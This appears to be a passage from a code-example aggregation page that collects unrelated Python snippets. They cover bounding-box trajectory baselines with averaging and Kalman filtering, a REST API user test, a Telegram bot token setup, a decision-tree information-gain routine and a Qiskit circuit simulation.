    writer.writeheader()
    for r in reader:
        inputnum = inputnum + 1
        del r['ROW_ID']
        del r['HADM_ID']
        startpoint = r['INTIME']
        endpoint = r['OUTTIME']
        startpoint = startpoint[:4] + startpoint[5:7] + startpoint[8:10]
        sp = int(startpoint)
コード例 #56
0
def use_baseline(script_args, hype, MASTER_ROOT_DIR):
    for index in range(script_args['DATA_AMOUNT_EVAL_START'],
                       script_args['DATA_AMOUNT_EVAL_END']):
        start_index = index * 100
        end_index = start_index + 100
        print("NOW LOADING IMAGES FROM " + str(start_index) + " TO " +
              str(end_index))

        fp = open(
            os.path.join(
                MASTER_ROOT_DIR, script_args['ROOT_DIR'], "bbox_files",
                "bboxes" + str(start_index) + "to" + str(end_index)) + ".txt",
            "rb")
        list_of_dicts = pickle.load(fp)
        total_seq_len = hype['input_seq_len'] + hype['target_seq_len']
        for j in range((end_index - start_index) // total_seq_len):
            start_img = j * total_seq_len
            end_img = start_img + total_seq_len

            all_agents_subset = []
            for dict in list_of_dicts[start_img:end_img]:
                for agent in dict.keys():
                    all_agents_subset.append(agent)
            all_agents_subset_unique = list(set(all_agents_subset))
            print("TOTAL UNIQUE AGENTS " + str(len(all_agents_subset_unique)))
            for current_agent in all_agents_subset_unique:
                current_agent_counter = 0
                for dict in list_of_dicts[start_img:end_img]:
                    if current_agent in dict.keys():
                        current_agent_counter += 1
                if current_agent_counter == total_seq_len:
                    print("NOW WORKING ON AGENT " + str(current_agent))

                    if script_args['BASELINE'] in ['AVG']:
                        avg_bbox_diff = np.zeros(4)
                        agent_bbox = list_of_dicts[start_img][current_agent]
                        for dict in list_of_dicts[
                                start_img:start_img +
                                script_args['input_seq_len']]:
                            avg_bbox_diff += (dict[current_agent] - agent_bbox)
                        last_known_agent_bbox = list_of_dicts[
                            start_img + script_args['input_seq_len'] -
                            1][current_agent]
                        prediction = last_known_agent_bbox + script_args['target_seq_len'] * \
                                     (avg_bbox_diff / (script_args['input_seq_len'] - 1))

                        for dict in list_of_dicts[start_img:end_img]:
                            dict[str(current_agent) +
                                 ' (PREDICTION)'] = prediction
                    elif script_args['BASELINE'] in ['KALMAN']:
                        measurements = []
                        for dict in list_of_dicts[
                                start_img:start_img +
                                script_args['input_seq_len']]:
                            measurements.append(dict[current_agent])
                        measurements_np = np.asarray(measurements)
                        initial_state_mean = [
                            measurements_np[0, 0], 0, measurements_np[0, 1], 0,
                            measurements_np[0, 2], 0, measurements_np[0, 3], 0
                        ]
                        transition_matrix = [[1, 1, 0, 0, 0, 0, 0, 0],
                                             [0, 1, 0, 0, 0, 0, 0, 0],
                                             [0, 0, 1, 1, 0, 0, 0, 0],
                                             [0, 0, 0, 1, 0, 0, 0, 0],
                                             [0, 0, 0, 0, 1, 1, 0, 0],
                                             [0, 0, 0, 0, 0, 1, 0, 0],
                                             [0, 0, 0, 0, 0, 0, 1, 1],
                                             [0, 0, 0, 0, 0, 0, 0, 1]]
                        observation_matrix = [[1, 0, 0, 0, 0, 0, 0, 0],
                                              [0, 0, 1, 0, 0, 0, 0, 0],
                                              [0, 0, 0, 0, 1, 0, 0, 0],
                                              [0, 0, 0, 0, 0, 0, 1, 0]]
                        kf = KalmanFilter(
                            transition_matrices=transition_matrix,
                            observation_matrices=observation_matrix,
                            initial_state_mean=initial_state_mean)

                        for pred in range(script_args['target_seq_len']):
                            kf = kf.em(measurements_np, n_iter=5)
                            kf.smooth(measurements_np)
                        prediction = np.array([
                            measurements_np[-1, 0], measurements_np[-1, 1],
                            measurements_np[-1, 2], measurements_np[-1, 3]
                        ])
                        for dict in list_of_dicts[start_img:end_img]:
                            dict[str(current_agent) +
                                 ' (PREDICTION)'] = prediction
                else:
                    print("AGENT " + str(current_agent) + " NOT FULLY PRESENT")

        with open(
                "predictions_baseline" + str(start_index) + "to" +
                str(end_index) + ".txt", "wb") as fp:
            pickle.dump(list_of_dicts, fp)
コード例 #57
0
ファイル: test_get_user.py プロジェクト: ellinaMart/api_tests
# -*- coding: utf-8 -*-
import requests
import os
import json

with open(os.path.join(os.path.dirname('api_tests'), 'config.json')) as config_file:
    config = json.load(config_file)

def test_get_user():
    user_ids = []
    # для каждой страницы юзеров отправляем запрос на список юзеров на каждой странице
    for page in [1,2,3]:
        params = {
            "page" : page
        }
        resp = requests.get(config["url_users"], params)
        assert resp.status_code == 200

        # проверяем, что возвращается верная страница
        json_data = json.loads(resp.text)
        assert json_data["page"] == page

        # собираем id всех юзеров в массив
        for i in json_data["data"]:
            user_ids.append(i["id"])

        # для каждого id юзера из массива отправляем запрос на получение информации о каждом юзере
    for id in user_ids:
        resp_user = requests.get(config["url_users"] + "/" + str(id))
        assert resp_user.status_code == 200
コード例 #58
0
ファイル: goes.py プロジェクト: stoyanovd/yodabotrus
    a = sorted(a, key=lambda s: sorting_rule(morph.parse(s)[0].tag))

    ans = ' '.join(a)
    bot.send_message(chat_id=update.message.chat_id, text=ans)


#################################################
from yaml import load, dump

env_file = '.env.yaml'

token_str = 'TELEGRAM_BOT_TOKEN'

if os.path.exists(env_file):
    print('find local env file')
    with open(env_file, 'r') as f:
        data = load(f)
        assert token_str in data.keys()
        os.environ[token_str] = data[token_str]

assert token_str in os.environ.keys()

TOKEN = os.environ.get(token_str)
PORT = int(os.environ.get('PORT', '5000'))

#################################################


updater = Updater(TOKEN)

dispatcher = updater.dispatcher
コード例 #59
0
        for n in self.data:
            if n[0] == 0:
                win0 += 1
            else:
                win1 += 1
                
        if win0 > win1:
            self.label = 0
        else:
            self.label = 1

#--------------------------------------------   
        
        

file = open('specttrain.txt', 'r')
data = file.readlines()
data = data[:-1]
file.close()

data_list = [[int(x) for x in xs.strip().split(",")] for xs in data]


i_gain = []

for i in range(1,len(data_list[0])):
    node = Node(data_list)
    node.create_layer(i)

    i_gain.append((I(node),i))
    
コード例 #60
0

if __name__ == '__main__':
    n = 2
    f = lambda rep: rep[-1]
    # f = lambda rep: "1" if rep[0:2] == "01" or rep[0:2] == "10" else "0"
    # f = lambda rep: "0"
    prog = make_circuit(n, f)
    sample_shot = 2800
    backend = BasicAer.get_backend('statevector_simulator')

    circuit1 = transpile(prog, FakeVigo())
    circuit1.x(qubit=3)
    circuit1.x(qubit=3)
    prog = circuit1

    info = execute(prog, backend=backend).result().get_statevector()
    qubits = round(log2(len(info)))
    info = {
        np.binary_repr(i, qubits): round(
            (info[i] * (info[i].conjugate())).real, 3)
        for i in range(2**qubits)
    }

    writefile = open("../data/startQiskit_Class210.csv", "w")
    print(info, file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(), file=writefile)
    print(circuit1, file=writefile)
    writefile.close()